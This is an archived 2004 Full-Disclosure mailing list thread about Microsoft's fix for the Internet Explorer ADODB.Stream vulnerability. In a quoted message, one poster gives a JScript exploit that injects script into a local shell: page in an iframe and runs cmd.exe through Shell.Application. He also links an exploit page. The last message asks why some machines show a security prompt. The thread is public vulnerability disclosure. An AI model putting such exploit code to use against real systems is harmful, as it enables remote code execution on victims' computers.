lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: johnspood at yahoo.com (Mr. John)
Subject: Betr.: Re: Fix for IE ADODB.Stream vulnerability is out

It is OK, but it causes security alert on some
machines because of "unsafe component". It isn't good
for us. But it is interesting that only on some
machines, this security alert prompted, on most winXP,
cmd.exe will run without any prompt.
What is your idea?


--- Jelmer <jkuperus@...net.nl> wrote:
> Because we avoid the adodb.stream issue all
> together,
> You can patch it, but if you leave open other
> issues, well it's pointless
> Instead we just swap in this instead of the old
> shellcode:
> 
> 
> -- snip --
> 
> function injectIt() {
>  
>
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
> cript language="JScript" DEFER>var obj=new
>
ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c
> pause");</script>');
> }
> document.write('<iframe
> src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
> setTimeout("injectIt()", 1000);
> 
> --snip--
> 
> 
> And it's working again, how long did it take? What
> like an hour since
> Microsoft's announcement ?
> 
> 
> 
> 
> -----Original Message-----
> From: Pascal Zoutendijk
> [mailto:Pascal.Zoutendijk@...a.nl] 
> Sent: vrijdag 2 juli 2004 23:28
> To: hescominsoon@...anuelcomputerconsulting.com;
> jkuperus@...net.nl
> Cc: helmut_hauser@...mail.com;
> full-disclosure@...ts.netsys.com
> Subject: Betr.: Re: [Full-Disclosure] Fix for IE
> ADODB.Stream vulnerability
> is out
> 
> what you should be getting (assuming the patch does
> work) is something like
> the
> following:
> 
> line: 3
> char: 3
> Error: Access is denied
> Code: 0
> 
> etc...
> 
> dunno why it doesn't work on some systems though.
> 
> Met vriendelijke groet,
> 
> Pascal Zoutendijk
> TBWA \ ICT Services
> Prof W.H. Keesomlaan 8
> 1183 DJ  Amstelveen, the Netherlands
> Tel: +31205715300
> Fax:+31205715639
> >>> William Warren
> <hescominsoon@...anuelcomputerconsulting.com>
> 02-07-04
> 22:24
> >>>
> i have a athlon xp 2000+ not a slow system.  I am
> running ie6 sp1 
> all patched up..for this test..my mzin browser is
> mozilla 
> obviously mozilla is immune to this one..:)
> 
> Jelmer wrote:
> 
> > That depends, are you using firefox? ;)
> > 
> > It works on my ie6 sp1 + latest and greatest
> *cough* patches
> > It does however use settimeout, maybe you have a
> low end system, and you
> > need a longer wait, just try reloading it a couple
> of times
> > 
> > 
> > -----Original Message-----
> > From: full-disclosure-admin@...ts.netsys.com
> > [mailto:full-disclosure-admin@...ts.netsys.com] On
> Behalf Of William
> Warren
> > Sent: vrijdag 2 juli 2004 20:47
> > To: Jelmer
> > Cc: 'Helmut Hauser';
> full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] Fix for IE
> ADODB.Stream vulnerability is
> out
> > 
> > this returns an error..is that all it is supposed
> to do?
> > 
> > 
> > Jelmer wrote:
> > 
> > 
> >>Too bad it won't do you one ounce any good
> >>
>
>>http://62.131.86.111/security/idiots/malware2k/installer.htm
> >>
> >>Credit: http-equiv
> >>
> >>
> >>
> >>
> >>-----Original Message-----
> >>From: full-disclosure-admin@...ts.netsys.com
> >>[mailto:full-disclosure-admin@...ts.netsys.com] On
> Behalf Of Helmut Hauser
> >>Sent: vrijdag 2 juli 2004 18:39
> >>To: full-disclosure@...ts.netsys.com
> >>Subject: [Full-Disclosure] Fix for IE ADODB.Stream
> vulnerability is out
> >>
> >>
> >>
> > 
> >
>
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4d05
> > 
> >>6748-c538-46f6-b7c8-2fbfd0d237e3
> >>
> >>Better late than never ...
> >>
> >>Helmut Hauser
> >>
> >>_______________________________________________
> >>Full-Disclosure - We believe in it.
> >>Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> >>
> >>
> >>_______________________________________________
> >>Full-Disclosure - We believe in it.
> >>Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> >>
> > 
> > 
> 
> -- 
> My "Foundation" verse:
> Isa 54:17  No weapon that is formed against thee
> shall prosper; 
> and every tongue that shall rise against thee in
> judgment thou 
> shalt condemn. This is the heritage of the servants
> of the LORD, 
> and their righteousness is of me, saith the LORD.
> 
> -- carpe ductum -- "Grab the tape"
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> 
>
_____________________________________________________________________
> This message has been checked for all known viruses.
> 
> 
>
_____________________________________________________________________
> This message has been checked for all known viruses.
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> 



	
		
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage!
http://promotions.yahoo.com/new_mail

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ